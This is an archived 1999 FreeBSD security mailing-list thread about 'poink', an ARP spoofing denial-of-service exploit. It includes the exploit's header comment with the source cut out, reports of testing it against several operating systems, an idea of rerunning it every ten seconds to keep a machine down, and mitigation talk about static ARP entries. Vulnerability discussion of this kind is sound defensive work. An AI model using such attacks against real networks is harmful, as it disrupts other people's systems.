Date: Mon, 19 Apr 1999 20:24:52 +0200 Message-ID: <19223.924546292@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Paul Hart writes: >On Mon, 19 Apr 1999, Chris wrote: > >> id rather not post the source to the list, since this is how exploits >> get distributed, and bad things occur. > >Well, so much for the full-disclosure so many of us value. Is this the >same "poink" that was recently posted to Bugtraq? It sounds like, which means you have to be on same ethernet and what it does is make it look like another machine is configured with same IP. Not a big threat for most people. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:28:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from kinetic.tiora.net (kinetic.tiora.net [206.251.130.15]) by hub.freebsd.org (Postfix) with ESMTP id 3BC541523C for ; Mon, 19 Apr 1999 11:28:21 -0700 (PDT) (envelope-from liam@kinetic.tiora.net) Received: from localhost (liam@localhost) by kinetic.tiora.net (8.9.3/8.9.3) with ESMTP id LAA00011 for ; Mon, 19 Apr 1999 11:24:59 -0700 (PDT) Date: Mon, 19 Apr 1999 11:24:59 -0700 (PDT) From: Liam Slusser To: security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a earlier email Chris said his fbsd 3.x was affected...and also said arp errors in /var/log/messages in 2.2.5....but this looks like a WinNT/9x DoS from the geek-girl report here. Is fbsd affected..and if so..what versions? Thanks! 
;)
liam

System Administrator
Tiora Networks | www.tiora.net <---- tiora's webpage
www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
Lowered turbo powered Honda Civics are really cool. <---------- my quote

On Mon, 19 Apr 1999, Daniel Hagan wrote:

> I don't have time to find the archive URL for this post right now, but
> this should give people something to work with. The header to the code
> has a URL reference to another (originating ?) article.
>
> Daniel
>
> --
> Daniel Hagan
> Computer Systems Engineer
> dhagan@cs.vt.edu
>
> ---------- Forwarded message ----------
> Date: Tue, 13 Apr 1999 11:25:34 -0700
> From: route@RESENTMENT.INFONEXUS.COM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: Re: ARP problem in Windows9X/NT
>
> [kay wrote]
> |
> | Could you be more specific with those XX-fields ?
>
> The source ethernet address appears to be arbitrary. The destination
> ethernet address needs to be either the address of the target host, or
> a broadcast address.
>
> | I started writing that proggie with plain syscalls, but it would only run
> | on Linux, so I modified one of the examples in Route's Libnet 0.9 to do
> | the stuff. I haven't tested it yet since I don't have LAN at home...
>
> Didn't test your code. Rolled my own from the same libnet example, and it
> does work against NT and 95/98.
>
> | For those who are still wondering what the hell Libnet is: check out
> | http://www.infonexus.com/~demon9
>
> My site has moved temporarily to http://lazy.accessus.net/~route.
> Libnet is hosted there for the time being
> (http://lazy.accessus.net/~route/Libnet) but will move to
> http://www.packetfactory.net when I get that site up.
>
> For those of you who don't know, Libnet is a library for portable
> injection. It is the `libpwrite` analog to libpcap. I suppose this is
> as good a time as any to announce the release of version 0.99 which adds
> a lot of new functionality and fixes a few bugs.
>
> Oh yah. Here's poink. Poink-poink!
>
> /*
>  * $Id$
>  *
>  * poink.c - NT/9x DOS attack
>  *
>  * Code:
>  * Copyright (c) 1999 Mike D. Schiffman
>  * route|daemon9
>  * All rights reserved.
>  *
>  * Original Idea:
>  * Joel Jacobson (joel@mobila.cx)
>  *
>  * This simple exploit was written as per the specification from Joel
>  * Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
>  *
>  * Needs libnet 0.99.
>  * Currently: http://lazy.accessus.net/~route/libnet
>  * Soon: http://www.packetfactory.net/
>  *
>  * gcc poink.c -o poink -lnet
>  *
>  * Redistribution and use in source and binary forms, with or without
>  * modification, are permitted provided that the following conditions
>  * are met:
>  * 1. Redistributions of source code must retain the above copyright
>  *    notice, this list of conditions and the following disclaimer.
>  * 2. Redistributions in binary form must reproduce the above copyright
>  *    notice, this list of conditions and the following disclaimer in the
>  *    documentation and/or other materials provided with the distribution.
>  *
>  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
>  * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
>  * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
>  * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
>  * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
>  * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
>  * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
>  * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
>  * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
>  * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
>  * SUCH DAMAGE.
>  *
>  */
>
> [ Source program cut, see geek-girl.com for archive ]
>
> --
> I live a world of paradox...
> My willingness to destroy is your chance for
> improvement, my hate is your faith -- my failure is your victory, a victory
> that won't last.
>

From owner-freebsd-security Mon Apr 19 11:42:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 32E7B14F47 for ; Mon, 19 Apr 1999 11:42:06 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id OAA15783; Mon, 19 Apr 1999 14:35:25 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Mon, 19 Apr 1999 14:35:24 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Poul-Henning Kamp
Cc: Paul Hart, Chris, security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-Reply-To: <19223.924546292@critter.freebsd.dk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 19 Apr 1999, Poul-Henning Kamp wrote:

> In message , Paul Hart writes:
> >On Mon, 19 Apr 1999, Chris wrote:
> >
> >> I'd rather not post the source to the list, since this is how exploits
> >> get distributed, and bad things occur.
> >
> >Well, so much for the full-disclosure so many of us value. Is this the
> >same "poink" that was recently posted to Bugtraq?
>
> It sounds like it, which means you have to be on the same ethernet, and what
> it does is make it look like another machine is configured with the same IP.
>
> Not a big threat for most people.
His report suggests it does nasty things to -STABLE and -CURRENT, although
off hand my response on seeing the bugtraq posting was exactly the same: arp
is arp is arp is not so very evil. However, I have not tested it, and we've
had one positive report of pain resulting from poink. I did not realize it
was the same poink as the bugtraq one, as I had already dismissed it as
"unlikely".

The threat that did come to mind is the kernel message thing: syslogd
appears to fsync the log after each message coming from the kernel. If
someone can generate sufficient log messages, they can seriously consume
disk i/o bandwidth. I discovered this the hard way when I stuck a bit too
much debugging code into my tokens module. :) Now I just kill syslogd before
doing anything resulting in a lot of kernel output. Since arp announcements
do come from the kernel, I suspect lots could cause pain. But I would hope
it wouldn't crash the machine.

Anyhow, my crash boxes are all tied up right now (being crashed by other
code, that is) so maybe someone out there could verify this?

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
                                      http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Mon Apr 19 11:56:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 38EAF15711 for ; Mon, 19 Apr 1999 11:56:34 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA06070; Mon, 19 Apr 1999 11:53:44 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Chris
Cc: Paul Hart, security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-reply-to: Your message of "Mon, 19 Apr 1999 13:58:23 EDT."
Date: Mon, 19 Apr 1999 11:53:44 -0700
Message-ID: <6068.924548024@zippy.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> so i guess, you're damned if you do and you're damned if you don't? is that
> the way it works?

In this area of endeavor? You bet! That's exactly the way it works. :-)

- Jordan

From owner-freebsd-security Mon Apr 19 11:56:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mozart.csl.cornell.edu (MOZART.CSL.CORNELL.EDU [132.236.71.20]) by hub.freebsd.org (Postfix) with ESMTP id 84B6E155C4 for ; Mon, 19 Apr 1999 11:56:44 -0700 (PDT) (envelope-from rajit@csl.cornell.edu)
Received: from mozart.csl.cornell.edu (localhost [127.0.0.1]) by mozart.csl.cornell.edu (8.9.3/8.9.2) with ESMTP id OAA02778 for ; Mon, 19 Apr 1999 14:54:18 -0400 (EDT) (envelope-from rajit@mozart.csl.cornell.edu)
Message-Id: <199904191854.OAA02778@mozart.csl.cornell.edu>
To: security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-reply-to: Your message of "Mon, 19 Apr 1999 11:54:21 MDT."
Date: Mon, 19 Apr 1999 14:54:18 -0400
From: Rajit Manohar
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi all,

I just tested poink on FreeBSD 3.1-RELEASE, and the machine has a minor
problem and then recovers. As people pointed out, arp is arp and it really
shouldn't hose systems much. I haven't tried out extensive tests yet...
maybe later in the evening when I have more time. :)

Here's my log file:

Apr 19 14:39:32 /kernel: arp: is using my IP address !
Apr 19 14:39:32 last message repeated 16 times
Apr 19 14:39:32 /kernel:
Apr 19 14:39:32 /kernel: arp: is using my IP address !
Apr 19 14:39:32 last message repeated 2 times

( -> your machine, -> your ethernet addr, -> your ip addr :) )

The next thing that happened was that ypbind complained for a bit (NIS
server not responding) and amd was unhappy. The machine always responded to
pings, but my home directory disappeared temporarily. In about a minute,
everything returned to normal (AFAIK). I'd guess that a repeated-poink, or a
poink of an nfs server would be a more serious problem.
-Rajit

From owner-freebsd-security Mon Apr 19 11:59:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from speed.matrix.com.br (speed.matrix.com.br [200.202.17.241]) by hub.freebsd.org (Postfix) with ESMTP id CED7F155DB for ; Mon, 19 Apr 1999 11:59:05 -0700 (PDT) (envelope-from camposr@MATRIX.COM.BR)
Received: from localhost (speed@localhost) by speed.matrix.com.br (8.9.3/8.9.3) with ESMTP id PAA09931; Mon, 19 Apr 1999 15:54:40 -0300 (EST)
X-Authentication-Warning: speed.matrix.com.br: speed owned process doing -bs
Date: Mon, 19 Apr 1999 15:54:40 -0300 (EST)
From: Rodrigo Campos
X-Sender: speed@speed.matrix.com.br
To: Liam Slusser
Cc: security@FreeBSD.ORG
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Organization: Matrix Network
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 19 Apr 1999, Liam Slusser wrote:

>
> In an earlier email Chris
> said his fbsd 3.x was affected... and also said arp errors in
> /var/log/messages in 2.2.5... but this looks like a WinNT/9x DoS from
> the geek-girl report here. Is fbsd affected.. and if so.. what versions?
> Thanks! ;)
>

I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable; they
are all vulnerable. It's not a big threat anyway, as you have to be on the
same ethernet to use the exploit.
Regards,

--
________________________
Rodrigo Albani de Campos
Matrix Internet - NOC
- Be a "Glad I Did" instead of a "Wish I Had" -

From owner-freebsd-security Mon Apr 19 12:11:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id 20083155B8 for ; Mon, 19 Apr 1999 12:11:27 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com)
Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id PAA06590; Mon, 19 Apr 1999 15:08:58 -0400 (EDT)
Date: Mon, 19 Apr 1999 15:08:58 -0400 (EDT)
From: Chris
To: Rajit Manohar
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-Reply-To: <199904191854.OAA02778@mozart.csl.cornell.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

rajit-

so, if you set up a timer to execute the poink sploit on the box every, say,
10 seconds? (it takes little bandwidth, and 10 seconds is nothing).. and the
machine is dead, and will stay dead...

-Chris

On Mon, 19 Apr 1999, Rajit Manohar wrote:

>
> Hi all,
>
> I just tested poink on FreeBSD 3.1-RELEASE, and the machine has a
> minor problem and then recovers. As people pointed out, arp is arp and
> it really shouldn't hose systems much. I haven't tried out extensive
> tests yet... maybe later in the evening when I have more time. :)
>
> Here's my log file:
>
> Apr 19 14:39:32 /kernel: arp: is using my IP address !
> Apr 19 14:39:32 last message repeated 16 times
> Apr 19 14:39:32 /kernel:
> Apr 19 14:39:32 /kernel: arp: is using my IP address !
> Apr 19 14:39:32 last message repeated 2 times
>
> ( -> your machine, -> your ethernet addr, -> your
> ip addr :) )
>
> The next thing that happened was that ypbind complained for a bit (NIS
> server not responding) and amd was unhappy. The machine always
> responded to pings, but my home directory disappeared temporarily. In
> about a minute, everything returned to normal (AFAIK). I'd guess that
> a repeated-poink, or a poink of an nfs server would be a more serious
> problem.
>
> -Rajit
>

From owner-freebsd-security Mon Apr 19 12:12:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 55C351565E for ; Mon, 19 Apr 1999 12:12:41 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id PAA22030; Mon, 19 Apr 1999 15:09:51 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Mon, 19 Apr 1999 15:09:51 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Rodrigo Campos
Cc: Liam Slusser, security@FreeBSD.ORG
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 19 Apr 1999, Rodrigo Campos wrote:

> On Mon, 19 Apr 1999, Liam Slusser wrote:
>
> > In an earlier email Chris
> > said his fbsd 3.x was affected... and also said arp errors in
> > /var/log/messages in 2.2.5... but this looks like a WinNT/9x DoS from
> > the geek-girl report here. Is fbsd affected.. and if so.. what versions?
> > Thanks! ;)
>
> I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable; they
> are all vulnerable. It's not a big threat anyway, as you have to be on
> the same ethernet to use the exploit.

And mind you, we are only vulnerable in the sense that we use the arp
service, which supports no security in any form. :)

Is there a way to disable arp resolution (and also detection of other
clients on the same IP) and just use hard coded arp entries? This would
certainly not be the default, but it would be nice if it were an option.
Unfortunately ipfw presumably can't do anything as arp is below IP level.

I really don't think this is a very big issue personally, although I can see
restricted instances where you'd want to do something about it (i.e., shared
untrusted network environments, or if one of n servers in a server pool on a
particular ethernet is broken into). If we do add a sysctl to disable arp
collision detection, then you'd also need for all machines on the ethernet
to use hard coded arp mappings, or they would just obey the other guy's arp
message and send messages to him.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
                                      http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Mon Apr 19 12:17: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mozart.csl.cornell.edu (MOZART.CSL.CORNELL.EDU [132.236.71.20]) by hub.freebsd.org (Postfix) with ESMTP id 8664615713 for ; Mon, 19 Apr 1999 12:17:00 -0700 (PDT) (envelope-from rajit@csl.cornell.edu)
Received: from mozart.csl.cornell.edu (localhost [127.0.0.1]) by mozart.csl.cornell.edu (8.9.3/8.9.2) with ESMTP id PAA03075 for ; Mon, 19 Apr 1999 15:14:31 -0400 (EDT) (envelope-from rajit@mozart.csl.cornell.edu)
Message-Id: <199904191914.PAA03075@mozart.csl.cornell.edu>
To: security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-reply-to: Your message of "Mon, 19 Apr 1999 15:08:58 EDT."
Date: Mon, 19 Apr 1999 15:14:31 -0400
From: Rajit Manohar
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> so, if you set up a timer to execute the poink sploit on the box every,
>> say, 10 seconds? (it takes little bandwidth, and 10 seconds is nothing)..
>> and the machine is dead, and will stay dead...
>>
>> -Chris

Right. I'm sure that's what would happen. And a server would be worse,
because all the clients would get hosed...

(The same sort of thing happens if someone decides to plug a machine onto a
subnet and uses someone else's IP address...)
-Rajit

From owner-freebsd-security Mon Apr 19 12:24: 9 1999
Delivered-To: freebsd-security@freebsd.org
Received: from intra.ispchannel.net (intra.ispchannel.net [208.166.60.21]) by hub.freebsd.org (Postfix) with ESMTP id 3E17415A77 for ; Mon, 19 Apr 1999 12:24:00 -0700 (PDT) (envelope-from nicole@ispchannel.net)
Received: from dogbert.mediacity.com (dogbert.mediacity.com [208.138.36.140]) by intra.ispchannel.net (Postfix) with ESMTP id 97259F00C; Mon, 19 Apr 1999 12:21:34 -0700 (PDT)
Content-Length: 1659
X-Mailer: XFMail 1.2 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
Date: Mon, 19 Apr 1999 12:21:34 -0700 (PDT)
Organization: The ISP Channel
From: Nicole Harrington
To: Rodrigo Campos
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Cc: security@FreeBSD.ORG, Liam Slusser
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 19-Apr-99 Rodrigo Campos wrote:
> On Mon, 19 Apr 1999, Liam Slusser wrote:
>
>>
>> In an earlier email Chris
>> said his fbsd 3.x was affected... and also said arp errors in
>> /var/log/messages in 2.2.5... but this looks like a WinNT/9x DoS from
>> the geek-girl report here. Is fbsd affected.. and if so.. what versions?
>> Thanks! ;)
>>
>
> I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable; they
> are all vulnerable. It's not a big threat anyway, as you have to be on
> the same ethernet to use the exploit.
>
> Regards,
>

But what sort of access do you need? Can this be run on a shell acct
without root privileges?
Nicole

> --
> ________________________
> Rodrigo Albani de Campos
> Matrix Internet - NOC
> - Be a "Glad I Did" instead of a "Wish I Had" -
>

# The statements made above do not necessarily represent those of MCW/ISPC. #
# However I am working on it. #

 |\ __ /| (`\
 | o_o |__ ) )
 // \\
Nicole Harrington | SR Systems Administrator
-------------------(((---(((-----------------------
nicole@mediacity.com - nicole@ispchannel.com
www.mediacity.com - www.ispchannel.com
Phone: 650-237-1454 - Pager: 415-301-2482
Powered By Coca-Cola and FreeBSD
I'm not ADD I'm just MultiThreaded!
Microsoft: What bug would you like today?
----------------------------------------------------

From owner-freebsd-security Mon Apr 19 12:36:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from andyo.prime.net (P3M2.prime.net.ua [195.64.229.234]) by hub.freebsd.org (Postfix) with ESMTP id 5380215695; Mon, 19 Apr 1999 12:34:42 -0700 (PDT) (envelope-from andyo@prime.net.ua)
Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.8.7/8.8.7) with ESMTP id WAA00384; Mon, 19 Apr 1999 22:33:01 +0300 (EET DST) (envelope-from andyo@prime.net.ua)
Message-ID: <371B84E8.C50BF21D@prime.net.ua>
Date: Mon, 19 Apr 1999 22:32:59 +0300
From: Андрей В. Олейник (Andy V. Oleynik)
Reply-To: andyo@prime.net.ua
Organization: М-Инфо
X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386)
X-Accept-Language: ru, uk, en
MIME-Version: 1.0
To: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
Subject: HAPPY99 worm spammer detected
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I received it on Saturday and rejected it in /etc/mail/access.

Received: from hub.freebsd.org (hub.FreeBSD.ORG [204.216.27.18]) by mail.prime.net.ua (8.9.3/8.9.1) with ESMTP id RAA01253 for ; Sat, 17 Apr 1999 17:31:57 +0300 (EEST)
Received: by hub.freebsd.org (Postfix, from userid 538) id C2CA515020; Sat, 17 Apr 1999 07:32:09 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with SMTP id A23E51CD676; Sat, 17 Apr 1999 07:32:09 -0700 (PDT) (envelope-from owner-freebsd-questions)
Received: by hub.freebsd.org (bulk_mailer v1.12); Sat, 17 Apr 1999 07:32:09 -0700
Delivered-To: freebsd-questions@freebsd.org
Received: from lucy.ddyne.com (mail.ddyne.com [199.78.56.3]) by hub.freebsd.org (Postfix) with ESMTP id 3E11A150FD for ; Sat, 17 Apr 1999 07:32:01 -0700 (PDT) (envelope-from lholcombe@ddyne.com)
Received: from lholcombe (unverified [199.78.56.75]) by lucy.ddyne.com (Rockliffe SMTPRA 2.1.7) with SMTP id ; Sat, 17 Apr 1999 09:42:20 -0500
Date: Sat, 17 Apr 1999 09:42:20 -0500
From: "Lane Holcombe"
Subject: Fw: How to boot freebsd?
X-Spanska: Yes
Sender: owner-freebsd-questions@FreeBSD.ORG
X-Loop: FreeBSD.ORG
Precedence: bulk
To: undisclosed-recipients: ;
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 89157baa06e7dad1f9e1900632028a69

Happy99.exe
Content-Type: application/octet-stream
Content-Transfer-Encoding: x-uuencode
Content-Disposition: inline; filename="Happy99.exe"

--
Andy V. Oleynik (When U aim for perfection, U discover it's a moving target ö80)

From owner-freebsd-security Mon Apr 19 12:56:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from speed.matrix.com.br (speed.matrix.com.br [200.202.17.241]) by hub.freebsd.org (Postfix) with ESMTP id 45B57157B0 for ; Mon, 19 Apr 1999 12:56:11 -0700 (PDT) (envelope-from camposr@MATRIX.COM.BR)
Received: from localhost (speed@localhost) by speed.matrix.com.br (8.9.3/8.9.3) with ESMTP id QAA10125; Mon, 19 Apr 1999 16:51:57 -0300 (EST)
X-Authentication-Warning: speed.matrix.com.br: speed owned process doing -bs
Date: Mon, 19 Apr 1999 16:51:57 -0300 (EST)
From: Rodrigo Campos
X-Sender: speed@speed.matrix.com.br
To: Nicole Harrington
Cc: security@FreeBSD.ORG, Liam Slusser
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Organization: Matrix Network
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 19 Apr 1999, Nicole Harrington wrote:

> > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable; they
> > are all vulnerable. It's not a big threat anyway, as you have to be on
> > the same ethernet to use the exploit.
> >
> > Regards,
>
> But what sort of access do you need? Can this be run on a shell acct without
> root privileges?
>

As far as I know, you have to be root to run the exploit, as it uses raw
packets. But you can send this kind of packet with some kind of Windows
9x/NT network analysis tool, I can't remember the name right now, but of
course any user can do it from a Windows box, regardless of his privileges
(well, Windows has no privilege control anyway). I think it would be very
simple for a Winsock programmer to port the exploit, so any windows user
could run it inside your network, hrmmm, it could be dangerous... :/

I've tested the exploit against MacOS 8.5.1 and Solaris 7/i386, they both
are vulnerable. The Solaris box just couldn't access anything outside its
own network after that. The Windows 9x/NT boxes rebooted with a heavy
loaded attack.

Regards,

--
________________________
Rodrigo Albani de Campos
Matrix Internet - NOC
- Be a "Glad I Did" instead of a "Wish I Had" -

From owner-freebsd-security Mon Apr 19 13:57:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 106F81551A for ; Mon, 19 Apr 1999 13:57:43 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59776; Mon, 19 Apr 1999 14:54:59 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27522; Mon, 19 Apr 1999 14:54:56 -0600 (MDT)
Message-Id: <199904192054.OAA27522@harmony.village.org>
To: Rajit Manohar
Subject: Re: poink and freebsd
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Mon, 19 Apr 1999 14:54:18 EDT." <199904191854.OAA02778@mozart.csl.cornell.edu>
References: <199904191854.OAA02778@mozart.csl.cornell.edu>
Date: Mon, 19 Apr 1999 14:54:56 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199904191854.OAA02778@mozart.csl.cornell.edu> Rajit Manohar writes:
: about a minute, everything returned to normal (AFAIK). I'd guess that
: a repeated-poink, or a poink of an nfs server would be a more serious
: problem.

Sounds like your typical "Let's claim to be someone else and confuse
everybody" DOS that has been well known since at least the late 80's, if
not before. arp has no authentication in it, so short of hard wiring the
arp cache on all your machines, I don't think there is much that can be
done about this. Even detecting that it is going on and keeping the right
address is going to be hard in the face of a more demented attack from
cards that allow one to set one's own NIC address.

Warner

From owner-freebsd-security Mon Apr 19 13:58:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5696415680 for ; Mon, 19 Apr 1999 13:58:52 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59798; Mon, 19 Apr 1999 14:56:07 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27578; Mon, 19 Apr 1999 14:56:02 -0600 (MDT)
Message-Id: <199904192056.OAA27578@harmony.village.org>
To: Robert Watson
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Cc: Rodrigo Campos, Liam Slusser, security@FreeBSD.ORG
In-reply-to: Your message of "Mon, 19 Apr 1999 15:09:51 EDT."
Date: Mon, 19 Apr 1999 14:56:02 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Robert Watson writes:
: Is there a way to disable arp resolution (and also detection of other
: clients on the same IP) and just use hard coded arp entries? This would
: certainly not be the default, but it would be nice if it were an option.

Yes. One can add permanent ARP entries. But recall that you need to do this
on all clients of the victim machine.

Warner

From owner-freebsd-security Mon Apr 19 14: 2:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7F76815636 for ; Mon, 19 Apr 1999 14:02:42 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59823; Mon, 19 Apr 1999 14:59:57 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27640; Mon, 19 Apr 1999 14:59:53 -0600 (MDT)
Message-Id: <199904192059.OAA27640@harmony.village.org>
To: Rodrigo Campos
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Cc: Nicole Harrington, security@FreeBSD.ORG, Liam Slusser
In-reply-to: Your message of "Mon, 19 Apr 1999 16:51:57 -0300."
Date: Mon, 19 Apr 1999 14:59:53 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Rodrigo Campos writes:
: I've tested the exploit against MacOS 8.5.1 and Solaris 7/i386, they both
